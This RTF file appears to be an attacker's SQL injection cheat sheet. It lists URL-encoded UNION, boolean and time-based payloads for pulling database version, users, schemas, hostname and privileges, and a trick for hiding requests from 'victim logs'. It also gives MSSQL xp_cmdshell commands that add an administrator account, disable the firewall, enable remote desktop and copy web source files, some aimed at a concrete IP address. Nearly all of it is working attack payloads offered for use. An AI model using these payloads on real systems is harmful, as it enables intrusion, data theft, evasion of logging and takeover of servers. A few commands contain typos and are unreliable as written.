{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fnil\fcharset0 Calibri;\f1\fnil\fcharset0 LucidaGrande;\f2\froman\fcharset0 TimesNewRomanPSMT;
\f3\fmodern\fcharset0 CourierNewPSMT;\f4\fswiss\fcharset0 Helvetica;\f5\fmodern\fcharset0 Courier;
\f6\fmodern\fcharset0 Courier-Bold;}
{\colortbl;\red255\green255\blue255;\red190\green0\blue4;\red52\green52\blue52;\red247\green247\blue247;
}
\paperw11900\paperh16840\margl1440\margr1440\vieww17280\viewh11300\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\b\fs29\fsmilli14667 \cf1 \cb0 \expnd0\expndtw0\kerning0
\ul \ulc1 ALTERNATIVE METHODS FOR CHECKING OR EXTRACTING BASIC INFO:\

\b0 \ulnone \

\b \ul ALTERNATIVE METHODS FOR CHECKING VERSION:\

\b0 \ulnone \
Substitute the below in place of the "@@version" or "version()" that were used in the above examples:\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 convert(@@version using latin1)\
\pard\pardeftab720\partightenfactor0

\b \cf1 INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,convert(@@version using latin1),3,4,5--\

\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,convert(@@version using latin1),3,4,5--+-\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 unhex(hex(@@version))\
\pard\pardeftab720\partightenfactor0

\b \cf1 INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,unhex(hex(@@version)),3,4,5--\

\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,unhex(hex(@@version)),3,4,5--+-\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 @@GLOBAL.VERSION\
\pard\pardeftab720\partightenfactor0

\b \cf1 INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@GLOBAL.VERSION,3,4,5--\

\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,@@GLOBAL.VERSION,3,4,5--+-\
\
These methods replace the UNION SELECT statement:\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 and substring(@@version,1,1)=4\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 and substring(@@version,1,1)=5\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=725+and+substring(@@version,1,1)=4"}}{\fldrslt \cf2 http://www.site.com/index.php?id=725+and+substring(@@version,1,1)=4}}--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=725+and+substring(@@version,1,1)=5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=725+and+substring(@@version,1,1)=5}}--\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 NOTE
\b0 : You will need to test both and whichever one returns TRUE (or without any errors on page) will indicate the version number as either 4 or 5.\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 Sometimes you need try "=9" for MySQL 4 & "=10" for MySQL 5\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul ALTERNATIVE METHODS FOR CHECKING DATABASE:\

\b0 \ulnone \
Substitute the DB_NAME() in place of the "@@database" or "database()" that were used in the above examples:\
\'a0\'a0
\b INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,DB_NAME(),3,4,5--\
\'a0\'a0
\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,DB_NAME(),3,4,5--+-\
\
This method replaces the UNION SELECT statement with a different syntax:\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0 {\field{\*\fldinst{HYPERLINK "http://www.site.com./index.php?id=-725+SELECT+schema_name+FROM+information_schema.schemata"}}{\fldrslt \cf2 http://www.site.com./index.php?id=-725+SELECT+schema_name+FROM+information_schema.schemata}}--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\b NOTE
\b0 : this only works on versions 5+\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com./index.php?id=-725+SELECT+distinct(db)+FROM+mysql.db"}}{\fldrslt \cf2 http://www.site.com./index.php?id=-725+SELECT+distinct(db)+FROM+mysql.db}}--\
\
To find all of the Databases available:\
\pard\pardeftab720\partightenfactor0
{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,group_concat(schema_name),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,group_concat(schema_name),3,4,5+FROM+INFORMATION_SCHEMA.SCHEMATA}}--\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul ALTERNATIVE METHODS FOR CHECKING USER:\

\b0 \ulnone \
Substitute the below in place of the "@@user" or "user()" that were used in the above examples: \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 user_name()\
\pard\pardeftab720\partightenfactor0

\b \cf1 INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,user_name(),3,4,5--\

\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,user_name(),3,4,5--+-\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 system_user()\
\pard\pardeftab720\partightenfactor0

\b \cf1 INTEGER
\b0 : http://www.site.com/index.php?id=-725+UNION+SELECT+1,system_user(),3,4,5--\

\b STRING
\b0 : http://www.site.com/index.php?id=-725'+UNION+SELECT+1,system_user(),3,4,5--+-\
\
These methods replace the UNION SELECT statement with a different syntax:\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 SELECT user FROM mysql.user--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=725+SELECT+user+FROM+mysql.user"}}{\fldrslt \cf2 http://www.site.com/index.php?id=725+SELECT+user+FROM+mysql.user}}--\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 or 1=convert(int,(USER))--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=725+OR+1=convert(int,(USER"}}{\fldrslt \cf2 http://www.site.com/index.php?id=725+OR+1=convert(int,(USER}}))--\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul OTHER ITEMS OF INTEREST TO CHECK:
\b0 \ulnone \
\

\b \ul HOSTNAME:\

\b0 \ulnone \
You can determine the Database Server's hostname using the following in your UNION SELECT statements, like we did for version/user/database examples above:\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 HOST_NAME()\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 @@hostname\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 @@servername\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 SERVERPROPERTY()\
\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,HOST_NAME(),3,4,5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,HOST_NAME(),3,4,5}}--\
\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@hostname,3,4,5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@hostname,3,4,5}}--\
\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@servername,3,4,5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@servername,3,4,5}}--\
\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,SERVERPROPERTY(),3,4,5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,SERVERPROPERTY(),3,4,5}}--\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul WORKING DIRECTORY:\

\b0 \ulnone \
You can determine the Database Server's local directory using the following in your UNION SELECT statements, like we did for version/user/database examples above:\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 @@datadir\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@datadir,3,4,5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,@@datadir,3,4,5}}--\

\f1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 datadir()\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,datadir(),3,4,5"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,datadir(),3,4,5}}--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul CHECK IF CURRENT USER IS SYSADMIN:\

\b0 \ulnone \
These methods replace the UNION SELECT statement with a different syntax:\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 SELECT is_srvrolemember('sysadmin')--\
\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+SELECT+is_srvrolemember('sysadmin'"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+SELECT+is_srvrolemember('sysadmin'}})--\
\pard\pardeftab720\partightenfactor0

\f3 \cf1 o
\f2 \'a0\'a0 
\f0 returns 1 for true (No Errors), 0 for false (Errors).\

\f3 o
\f2 \'a0\'a0 
\f0 You might also try "bulkadmin" or "systemadmin" in place of 'sysadmin' before giving up on things.\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 SELECT is_srvrolemember('sysadmin', 'sa')--\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+SELECT+is_srvrolemember('sysadmin','sa'"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+SELECT+is_srvrolemember('sysadmin','sa'}})--\
\pard\pardeftab720\partightenfactor0

\f3 \cf1 o
\f2 \'a0\'a0 
\f0 Checks if "sa" a sysadmin? returns 1 for true (No Errors), 0 for false (Errors).\

\f3 o
\f2 \'a0\'a0 
\f0 Again you might also try "bulkadmin" or "systemadmin" in place of 'sysadmin' before giving up.\
\
\'95\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';\
\pard\pardeftab720\partightenfactor0
{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+SELECT+grantee,privilege_type,is_grantable+FROM+information_schema.user_privileges+WHERE+privilege_type='SUPER'"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+SELECT+grantee,privilege_type,is_grantable+FROM+information_schema.user_privileges+WHERE+privilege_type='SUPER'}}--\
\
\pard\pardeftab720\partightenfactor0

\f1 \cf1 \'b7
\f2 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 
\f0 SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';\
\pard\pardeftab720\partightenfactor0
{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+SELECT+host,user+FROM+mysql.user+WHERE+Super_priv='Y'"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+SELECT+host,user+FROM+mysql.user+WHERE+Super_priv='Y'}};\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul ALTERING OUTPUT RESULTS:\

\b0 \ulnone \
\pard\pardeftab720\partightenfactor0

\b \cf1 0x3a = :
\b0 , which can be used in-between columns during extraction to help separate the results\
\

\b 0x0a = new line
\b0  for results, which can be used to help make the output easier to read as it will drop each entry to a new line. This does not work on all systems, and most helpful to me when pulling emails.\
\

\b LIMIT 
\b0 - can be used to alter how the output is displayed as it alters the query to only pull details from the defined start and end points.\
In general you will see "LIMIT 0,1--" appended to the end of a request statement. If you want to pull or extract information on a specific set you can adjust it to fit your need. If for example you need the 99th entry you could simply append "LIMIT 99,1--" to the end of your request and it should filter your results based on what you have defined.\
\
\pard\pardeftab720\partightenfactor0

\b \cf1 \ul HOW TO KEEP YOUR SQLi REQUESTS OUT OF VICTIM LOGS:
\b0 \ulnone \
It is known that by simply appending "sp_password" to the end of the query you can hide your requests from T-SQL logs due to the way it handles sp_password for security measures.\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0{\field{\*\fldinst{HYPERLINK "http://www.site.com/index.php?id=-725+UNION+SELECT+1,version(),3,4,5--sp_password"}}{\fldrslt \cf2 http://www.site.com/index.php?id=-725+UNION+SELECT+1,version(),3,4,5--sp_password}}\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 Here is what the Admin finds in logs instead of your records:\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 -- 'sp_password' was found in the text of this event.\
\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 \'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0\'a0 -- The text has been replaced with this comment for security reasons.\
\

\b \ul COMMAND SHELL:\
\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f4\b0\fs32 \cf0 \cb1 \kerning1\expnd0\expndtw0 \ulnone \
\pard\pardeftab720\sl480\sa411\partightenfactor0

\fs28 \cf3 \expnd0\expndtw0\kerning0
xp_cmdshell is turned off by default, but you can still turn it on. \'a0So back to the query, enter the following:\
\pard\pardeftab720\sl480\partightenfactor0

\i \cf3 \'96 To allow advanced options to be changed.\uc0\u8232 EXEC\'a0sp_configure\'a0\'91show advanced options\'92, 1\u8232 \'97 To update the currently configured value for advanced options.\u8232 RECONFIGURE\u8232 \'97 To enable the feature.\u8232 EXEC\'a0sp_configure\'a0\'91xp_cmdshell\'92, 1\u8232 \'97 To update the currently configured value for this feature.\u8232 RECONFIGURE\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\i0\fs32 \cf0 \kerning1\expnd0\expndtw0 \
\pard\pardeftab720\sl480\sa411\partightenfactor0

\fs28 \cf3 \expnd0\expndtw0\kerning0
Now go back and run your whoami command, and you should be successful. \'a0So what now? \'a0You can add your own administrator user, disable the firewall, and enable remote desktop (if not already enabled):\
\pard\pardeftab720\sl480\partightenfactor0

\i \cf3 EXEC xp_cmdshell \'91net user colesec pa$$w0rd /ADD\'92\uc0\u8232 EXEC xp_cmdshell \'91net localgroup Administrators colesec /ADD\'92\u8232 EXEC xp_cmdshell \'91netsh firewall set opmode disable\'92\u8232 EXEC xp_cmdshell \'91reg add \'93HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\'94 /v fDenyTSConnections /t REG_DWORD /d 0 /f\'92\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\i0\fs32 \cf0 \kerning1\expnd0\expndtw0 \
\pard\pardeftab720\sl364\partightenfactor0

\f5\fs28 \cf0 \cb4 \expnd0\expndtw0\kerning0
; master.dbo.xp_cmdshell ' copy c:\\inetpub\\wwwroot\\login.aspx c:\\inetpub\\wwwroot\\login.txt';--\
\pard\pardeftab720\partightenfactor0

\f0\b\fs29\fsmilli14667 \cf1 \cb0 \ul \ulc1 \
\pard\pardeftab720\partightenfactor0

\f4\b0\fs32 \cf1 \ulnone On modern MSSQL servers xp_cmdshell is disabled by default\'85but you can re-enable it through SQL Injection!
\f0\fs29\fsmilli14667 \
\

\f4\fs32 The second problem is that to execute this procedure, you probably need to be running as the sa user. \
If you\'92re lucky and you are sa, here\'92s the steps to execute OS commands:\
\
\pard\pardeftab720\partightenfactor0

\f5 \cf1 	EXEC sp_configure 'show advanced options', 1;\
	RECONFIGURE;\
	EXEC sp_configure 'xp_cmdshell', 1;\
	RECONFIGURE;
\f0\fs29\fsmilli14667 \
\
\pard\pardeftab720\partightenfactor0

\f4\fs32 \cf1 Now that\'92s done, you can go ahead and use the xp_cmdshell:\
\
\pard\pardeftab720\partightenfactor0

\f5 \cf1 	exec master..xp_cmdshell 'dir c:'; --\
\
\pard\pardeftab720\partightenfactor0

\f4 \cf1 That\'92ll execute the dir command!\
\
One\'85small hitch\'85the output of the command isn\'92t returned\'85an easy way to get around that would be to just attack the application blind, for example:\
\
\pard\pardeftab720\partightenfactor0

\f5 \cf1 exec master..xp_cmdshell 'net user foobar Password123 /add'; -- \
exec master..xp_cmdshell 'net localgroups "Administrators" /add'; --\
\
\pard\pardeftab720\partightenfactor0

\f4 \cf1 The above command adds a new local administrator to the remote server. \
Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection!\
\
You can create a table and store the output of a command to it with the following:\
\
\pard\pardeftab720\partightenfactor0

\f5 \cf1 ; create table #output (id int identity(1,1), output nvarchar(255) null);\
; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:';\
\
\pard\pardeftab720\partightenfactor0

\f4 \cf1 Then to read the contents out with a SELECT statement like this one:\
\
\pard\pardeftab720\partightenfactor0

\f5 \cf1 ; select * from #output where output is not null order by id;\
\
\
\pard\pardeftab720\partightenfactor0

\f6\b \cf1 \ul EXAMPLE
\f5\b0 \ulnone \
\
\pard\pardeftab560\slleading20\pardirnatural\partightenfactor0

\f4\fs30 \cf1 \kerning1\expnd0\expndtw0 1. Create table\
	id=1; create table readWhoami (line varchar(2000));\
	{\field{\*\fldinst{HYPERLINK "http://46.17.59.200/sqli/select2/scase2_noerror.aspx?id=1;cReAte%20tAbLe%20readWhoami%20(line%20nvarchar(2000));"}}{\fldrslt http://46.17.59.200/sqli/select2/scase2_noerror.aspx?id=1;cReAte%20tAbLe%20readWhoami%20(line%20nvarchar(2000));}}\
\
2. Insert data\
	id=1; insert into readWhoami exec xp_cmdshell \'91whoami.exe\'92\
\pard\pardeftab560\slleading20\pardirnatural\partightenfactor0
{\field{\*\fldinst{HYPERLINK "http://46.17.59.200/sqli/select2/scase2_noerror.aspx?id=1;inSeRt%20into%20readWhoami%20(line)%20exec%20xp_cMdsHell%20%27whoami.exe%27--"}}{\fldrslt \cf1 http://46.17.59.200/sqli/select2/scase2_noerror.aspx?id=1;inSeRt%20into%20readWhoami%20(line)%20exec%20xp_cMdsHell%20%27whoami.exe%27--}}\
\
3. Read using time\
	id=1; if (ASCII(substring((select TOP 1line from readWhoami)1,1))=110) waiter delay \'9200:00:10\'92- -\
\pard\pardeftab560\slleading20\pardirnatural\partightenfactor0
{\field{\*\fldinst{HYPERLINK "http://46.17.59.200/sqli/select2/scase2_noerror.aspx?id=1;if%20(ASCII(substring((sElEcT%20TOP%201%20line%20from%20readWhoami),1,1))=110)%20WAITFOR%20DELAY%20%2700:00:10%27--"}}{\fldrslt \cf1 http://46.17.59.200/sqli/select2/scase2_noerror.aspx?id=1;if%20(ASCII(substring((sElEcT%20TOP%201%20line%20from%20readWhoami),1,1))=110)%20WAITFOR%20DELAY%20%2700:00:10%27--}}\
\
\pard\pardeftab560\slleading20\partightenfactor0
\cf1 create table readWhoami (line varchar(2000))\
insert into readWhoami\
  exec xp_cmdshell \'91whoami.exe\'92\
select TOP 1 line from readWhoami\
\
Create and Store a file\'92s input to a row in order to read it using time:\
\
	id=1; create table readStuff (id int identity(1,1), output varchar(255) null);\
	id=1; insert readStuff (output) exec xp_cmdshell \'91echo c:\\trophy\'92;- -\
\

\f0\fs29\fsmilli14667 \expnd0\expndtw0\kerning0
\
}